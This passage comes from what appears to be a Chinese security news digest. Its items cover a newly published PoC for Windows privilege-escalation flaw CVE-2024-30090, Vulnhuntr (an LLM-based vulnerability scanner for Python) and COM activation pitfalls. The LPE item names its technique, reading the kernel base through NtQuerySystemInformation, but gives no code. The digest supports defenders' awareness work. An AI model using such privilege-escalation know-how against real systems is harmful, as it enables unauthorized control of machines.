	<p>🏷️: .NET, 反序列化, Specula, 后门, 漏洞利用</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 CVE-2024-30090：Windows本地提权漏洞PoC公布</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">CVE-2024-30090 是由 DEVCORE 的 Angelboy 发现的一个本地提权（LPE）漏洞，该漏洞的 PoC（概念证明）已公布。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5b06c8ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EA2Hh7DjRv5VJXL5VD3AxlbCia8EXicELox1ia9sITupHX6ZiaQghIxgfVxA%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-30090 漏洞利用PoC：提权至SYSTEM</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-30090 漏洞利用 PoC 实现，可提升至 SYSTEM 权限</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAZslW9NzArMDwLtUblO845p2JaicEIpDC3RemAzyf2HuaGyqW3XibH8dw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAZslW9NzArMDwLtUblO845p2JaicEIpDC3RemAzyf2HuaGyqW3XibH8dw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8858225148882152"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-30090 是一个严重的安全漏洞，它允许攻击者在受影响的 Windows 系统上提升权限。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Angelboy 的工作显示了如何编译 x86 程序来利用这个漏洞，以及如何通过 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">NtQuerySystemInformation</code> 函数获取内核基地址。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">此 PoC 的开发得益于社区的资源和指导，包括 Cedric Halbronn 的教程和 bruno-1337 的 SeDebugPrivilege 利用代码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">资源 &amp; 引用部分提供了深入的学习材料，包括技术文章和视频，这些内容对于理解和学习如何从 Windows 内核中传播和利用漏洞至关重要。</section></li></ul>
	<br/>
	<p>🏷️: CVE, LPE, Windows, 漏洞, PoC</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 使用LLMs进行零样本漏洞发现的工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Vulnhuntr 是一个利用大型语言模型（LLMs）和静态代码分析来识别远程可利用漏洞的工具，专注于 Python 代码库，并支持发现包括本地文件包含（LFI）、任意文件覆盖（AFO）、远程代码执行（RCE）、跨站脚本（XSS）、SQL 注入（SQLI）、服务器端请求伪造（SSRF）和不安全的直接对象引用（IDOR）等漏洞类型。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1024" src="https://wechat2rss.xlab.app/img-proxy/?k=edb1e674&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAChDkoiadBoVVscXk3eb9W8cGIvcHmxklfE7mLQRfEfcxncRibed3MOPA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.725" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=b566f04c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAMibmo69NicXY8ZpVqNqvXHHerpAbL8htCRpyssXVHBlWj2QeONeCPxYQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Vulnhuntr 发布 14 个 LLM 发现的 0day 漏洞</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Vulnhuntr发布！首款AI发现0day漏洞的静态代码分析工具</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA6EF41bCN2NvZU5oSpSQLdePNEqpKngUXVebvgO6AcRPypBOIRoGykw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA6EF41bCN2NvZU5oSpSQLdePNEqpKngUXVebvgO6AcRPypBOIRoGykw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848558412424488"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Vulnhuntr 是首个利用 LLMs 发现 0day 漏洞的工具，它采用了独特的方法来识别和分析漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具的核心优势在于能够结合大型语言模型的分析能力和静态代码分析，提供更全面的安全检查。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Vulnhuntr 的分析过程包括 LLM 对代码的总体分析和针对特定漏洞的深入分析，以及对代码中的函数、类和变量进行的上下文请求，以完成从用户输入到服务器处理的整个调用链。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">分析报告中包含了漏洞的置信度评分，这有助于开发者评估和优先处理潜在的安全风险。</section></li></ul>
	<br/>
	<p>🏷️: LLMs, 漏洞发现, 代码分析, Python, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 COM对象激活的陷阱与解决方案</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文讨论了在使用COM对象（如ICorPublish接口）时，由于版本不兼容导致的问题，并提供了解决方案。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.857" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1000" src="https://wechat2rss.xlab.app/img-proxy/?k=4afc52bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAIJcPMibzic3HIIvuFb3NLYKApFQOdUnPy7o6a2Hr7wb9exKd7dLHIadA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.12417582417582418" data-w="910" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=95e16450&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EATibaDr6Z6wVNbSwF7DS7z0AicX8HbFiaicKg6khzoWxt0vAKkkicR6zQdkg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.23563218390804597" data-w="522" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=a603dc9f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAvDzRAQibsU5HRo0PVNPLbD35XVNuVSLBdib35Y7hehOwRYtKWHn8g1gw%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
